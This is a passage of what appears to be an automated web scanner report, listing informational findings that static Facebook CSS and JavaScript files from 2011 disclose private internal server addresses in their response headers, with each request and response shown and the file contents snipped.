User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 08 Jul 2011 16:38:00 GMT
X-FB-Server: 10.138.17.184
Content-Length: 5336
Vary: Accept-Encoding
Cache-Control: public, max-age=30599691
Expires: Sat, 07 Jul 2012 18:53:36 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1310151230,176820664*/

.ego_page.notes #pagelet_ego_pane{padding-top:52px}
.notesBlogText{font-size: 11px;line-height:1.5em;word-wrap:break-word}
.notesBlogText ul{list-style-type:square;margin:10p
...[SNIP]...

24.47. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PTQolaY4o54.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yB/r/PTQolaY4o54.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yB/r/PTQolaY4o54.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/careers/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:56:05 GMT
X-FB-Server: 10.138.17.183
Content-Length: 10833
Vary: Accept-Encoding
Cache-Control: public, max-age=27388462
Expires: Thu, 31 May 2012 14:52:13 GMT
Date: Tue, 19 Jul 2011 14:57:51 GMT
Connection: close

/*1306939856,176820663*/

.padded{padding:10px}
.rounded_container{margin:0;padding:0}
.inside_rounded{padding-bottom:0;margin-bottom:5px}
.careers_full{width:940px;margin-left:auto;margin-right:auto}
...[SNIP]...

24.48. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PzNsk8U51ji.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yB/r/PzNsk8U51ji.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yB/r/PzNsk8U51ji.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:07:07 GMT
X-FB-Server: 10.138.64.185
Content-Length: 3423
Vary: Accept-Encoding
Cache-Control: public, max-age=30813756
Expires: Tue, 10 Jul 2012 06:21:19 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1310365367,176832697*/

.GrowthInviteStory_Logo{background:#fff;border:1px solid #ccc}
.GrowthInviteStory_ThreePhotos{float:left;margin-right:10px}
.GrowthInviteStory_ThreePhotos img{margin:0 5px 5p
...[SNIP]...

24.49. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/y_PXXLWHa9g.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yB/r/y_PXXLWHa9g.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yB/r/y_PXXLWHa9g.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/help/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:27:41 GMT
X-FB-Server: 10.138.16.183
Vary: Accept-Encoding
Content-Length: 854
Cache-Control: public, max-age=30239653
Expires: Tue, 03 Jul 2012 14:52:12 GMT
Date: Tue, 19 Jul 2011 14:57:59 GMT
Connection: close

/*1309791207,176820407*/

if (window.CavalryLogger) { CavalryLogger.start_js(["Ubvhc"]); }

function contact_dialog_async_with_form(a){var b=new AsyncRequest().setMethod('GET').setReadOnly(true).setDa
...[SNIP]...

24.50. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/08tONxelrvf.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yD/r/08tONxelrvf.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yD/r/08tONxelrvf.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:56:59 GMT
X-FB-Server: 10.138.17.184
Vary: Accept-Encoding
Content-Length: 356
Cache-Control: public, max-age=30837728
Expires: Tue, 10 Jul 2012 12:59:37 GMT
Date: Tue, 19 Jul 2011 14:57:29 GMT
Connection: close

/*1310389245,176820664*/

.sp_35gihh{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zP/r/FzmFaNDPhjU.png);background-repeat:no-repeat;display:inline-block;height:35px;width:35px}
.sx_a395
...[SNIP]...

24.51. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/V-zkfHT8CXb.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yD/r/V-zkfHT8CXb.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yD/r/V-zkfHT8CXb.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:08:28 GMT
X-FB-Server: 10.138.64.182
Vary: Accept-Encoding
Content-Length: 827
Cache-Control: public, max-age=30807776
Expires: Tue, 10 Jul 2012 04:40:24 GMT
Date: Tue, 19 Jul 2011 14:57:28 GMT
Connection: close

/*1310359292,176832694*/

.sp_8vdyqc{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/MeNKGPh4G4i.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_44ac
...[SNIP]...

24.52. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/XByeV_qA1Uh.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yD/r/XByeV_qA1Uh.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yD/r/XByeV_qA1Uh.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/pages/create.php?ref_type=sitefooter
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:56:00 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 5944
Vary: Accept-Encoding
Cache-Control: public, max-age=24883313
Expires: Wed, 02 May 2012 14:59:41 GMT
Date: Tue, 19 Jul 2011 14:57:48 GMT
Connection: close

/*1304434782,169776068*/

#contentArea .uiHeader{margin-left:44px}
.co_reg_banner{width:100%}
.step_frame{padding:25px 55px 20px;background:#f7f7f7;width:650px;margin-bottom:30px}
.step_frame #progres
...[SNIP]...

24.53. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/4F3Iv5NBJOL.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yE/r/4F3Iv5NBJOL.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yE/r/4F3Iv5NBJOL.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:34:56 GMT
X-FB-Server: 10.138.69.183
Content-Length: 3435
Vary: Accept-Encoding
Cache-Control: public, max-age=30198128
Expires: Tue, 03 Jul 2012 03:20:53 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1309749684,176833975*/

.pagerpro_container{float:right;margin:0 0 0 0;padding:3px 0 4px 0;width:200px}
.pagerpro{float:right}
.pagerpro .pagerpro_li{display:inline}
.pagerpro .pagerpro_a{padding:3p
...[SNIP]...

24.54. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/lwKG0ViYlaK.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yE/r/lwKG0ViYlaK.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yE/r/lwKG0ViYlaK.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:15:36 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 865
Cache-Control: public, max-age=30425838
Expires: Thu, 05 Jul 2012 18:35:04 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

/*1309977261,169776320*/

.sp_4e7vaj{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/7mQ0CTXxgPa.png);background-repeat:no-repeat;display:inline-block;height:128px;width:258px}
.sx_52
...[SNIP]...

24.55. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/rwkuDRWV9jd.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yE/r/rwkuDRWV9jd.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yE/r/rwkuDRWV9jd.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 13 Jun 2011 02:12:33 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 2388
Vary: Accept-Encoding
Cache-Control: public, max-age=28437979
Expires: Tue, 12 Jun 2012 18:23:47 GMT
Date: Tue, 19 Jul 2011 14:57:28 GMT
Connection: close

/*1307989546,169776318*/

.friendBrowserCheckboxFilters{width:200px;margin:0 auto;float:left}
.friendBrowserCheckboxFilterHeader{margin-bottom:3px}
.friendBrowserCheckboxFilterTypeahead{margin-top:3px
...[SNIP]...

24.56. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/2zvsC0zVzMB.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yF/r/2zvsC0zVzMB.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yF/r/2zvsC0zVzMB.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:53:56 GMT
X-FB-Server: 10.138.69.182
Content-Length: 8541
Vary: Accept-Encoding
Cache-Control: public, max-age=26698741
Expires: Wed, 23 May 2012 15:16:46 GMT
Date: Tue, 19 Jul 2011 14:57:45 GMT
Connection: close

/*1306250209,176833974*/

.business_pages .product_selector ul,
.business_pages .banner_content,
.business_pages .tabs,
.business_pages .ads_info,
.business_pages .contact_sales{margin:0 auto;width:73
...[SNIP]...

24.57. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/FUYS70vIS4_.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yF/r/FUYS70vIS4_.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yF/r/FUYS70vIS4_.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:07:47 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 3539
Vary: Accept-Encoding
Cache-Control: public, max-age=30803417
Expires: Tue, 10 Jul 2012 03:28:34 GMT
Date: Tue, 19 Jul 2011 14:58:17 GMT
Connection: close

/*1310354862,169775813*/

.bulkTaggerTypeahead{width:210px}
.bulk_tagger_body .bulkTagIcon{margin-top:6px;margin-right:7px}
.bulk_tagger_body .bulkTagStatus{display:inline-block;padding-top:4px}
.bulk
...[SNIP]...

24.58. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/gQh69rr8JBH.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yF/r/gQh69rr8JBH.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yF/r/gQh69rr8JBH.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 15 Jul 2011 21:15:22 GMT
X-FB-Server: 10.138.64.182
Content-Length: 28645
Vary: Accept-Encoding
Cache-Control: public, max-age=31214528
Expires: Sat, 14 Jul 2012 21:40:25 GMT
Date: Tue, 19 Jul 2011 14:58:17 GMT
Connection: close

/*1310766057,176832694*/

.fbChatBuddyList .subheader,.fbChatBuddyList .hide_idle_marker,.fbChatBuddyList .suppress,.fbChatBuddyList .hide_empty_item,.fbChatBuddyList .hide_friend_list,.fbChatBuddyLis
...[SNIP]...

24.59. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/sobEsVhahXR.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yF/r/sobEsVhahXR.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yF/r/sobEsVhahXR.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:05:29 GMT
X-FB-Server: 10.30.145.198
X-Cnection: close
Content-Length: 13148
Vary: Accept-Encoding
Cache-Control: public, max-age=30881285
Expires: Wed, 11 Jul 2012 01:05:33 GMT
Date: Tue, 19 Jul 2011 14:57:28 GMT
Connection: close

/*1310432708,169775558*/

.callout_parent_box{position:relative;z-index:6}
.callout_outer_box{background-repeat:no-repeat;position:absolute}
.callout_inner_box{margin:15px;position:relative;overflow:h
...[SNIP]...

24.60. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/Bqaiy6eGUJa.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yG/r/Bqaiy6eGUJa.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yG/r/Bqaiy6eGUJa.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 16 May 2011 02:38:12 GMT
X-FB-Server: 10.138.17.184
Content-Length: 1396
Vary: Accept-Encoding
Cache-Control: public, max-age=25994679
Expires: Tue, 15 May 2012 11:43:23 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1305546144,176820664*/

.stream-search-pages .Search_Name{font-weight:bold}
.profile .stream-search-pages .highlight{background:none;border:none;margin:0;padding:0}
.stream-search-pages .uiStreamMes
...[SNIP]...

24.61. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/gh8wxcAgNvK.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yG/r/gh8wxcAgNvK.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yG/r/gh8wxcAgNvK.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:53:38 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Content-Length: 1299
Vary: Accept-Encoding
Cache-Control: public, max-age=23675218
Expires: Wed, 18 Apr 2012 15:24:31 GMT
Date: Tue, 19 Jul 2011 14:57:33 GMT
Connection: close

/*1303226710,169775812*/

.badgesMarketing .mainContent{width:960px}
.widgets_central_box{float:left;margin:20px 0 0;width:390px}
.widgets_central_box .desc{float:left;font-size: 13px;line-height:18px
...[SNIP]...

24.62. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/87W0ancRJRW.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yH/r/87W0ancRJRW.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yH/r/87W0ancRJRW.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:25:52 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Content-Length: 5072
Vary: Accept-Encoding
Cache-Control: public, max-age=30815245
Expires: Tue, 10 Jul 2012 06:46:05 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1310366755,169775557*/

.fbProfileLargePortrait{margin:2px 0 0 1px;width:75px;word-wrap:break-word}
.fbProfileLargePortrait .photoCrop{background:#eee;height:75px;overflow:hidden;position:absolute;w
...[SNIP]...

24.63. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/sHCa4y3LzLj.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yH/r/sHCa4y3LzLj.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yH/r/sHCa4y3LzLj.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/careers/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 02:22:05 GMT
X-FB-Server: 10.30.145.195
X-Cnection: close
Content-Length: 13857
Vary: Accept-Encoding
Cache-Control: public, max-age=28986708
Expires: Tue, 19 Jun 2012 02:49:39 GMT
Date: Tue, 19 Jul 2011 14:57:51 GMT
Connection: close

/*1308538213,169775555*/

.UIMediaHeader_Container{overflow:hidden}
.UIMediaHeader_BottomMargin{padding-bottom:17px}
.UIMediaHeader_TitleWrapper{border-bottom:1px solid #d8dfea;padding:10px 0 5px;z-in
...[SNIP]...

24.64. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/_J12hr-nH-4.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yI/r/_J12hr-nH-4.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yI/r/_J12hr-nH-4.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 14 Jul 2011 04:05:17 GMT
X-FB-Server: 10.138.64.184
Content-Length: 2813
Vary: Accept-Encoding
Cache-Control: public, max-age=31065773
Expires: Fri, 13 Jul 2012 04:21:37 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1310617246,176832696*/

#chatFriendsOnline .navigationLink span{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/zW/r/AebrcwrBeG6.png) no-repeat right 3px;padding:0 12px 0 2px}
#chatFriendsOnli
...[SNIP]...

24.65. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/d3jsdgznlXU.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yI/r/d3jsdgznlXU.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yI/r/d3jsdgznlXU.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:04 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 402
Cache-Control: public, max-age=30428292
Expires: Thu, 05 Jul 2012 19:15:45 GMT
Date: Tue, 19 Jul 2011 14:57:33 GMT
Connection: close

/*1309979745,169776320*/

.sp_5xrt5h{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/hIGTc2UFq5P.png);background-repeat:no-repeat;display:inline-block;height:88px;width:128px}
.sx_dc2
...[SNIP]...

24.66. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/x_JdY7BNW9-.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yI/r/x_JdY7BNW9-.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yI/r/x_JdY7BNW9-.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 14 Mar 2011 03:25:17 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 356
Cache-Control: public, max-age=28862393
Expires: Sun, 17 Jun 2012 16:18:35 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

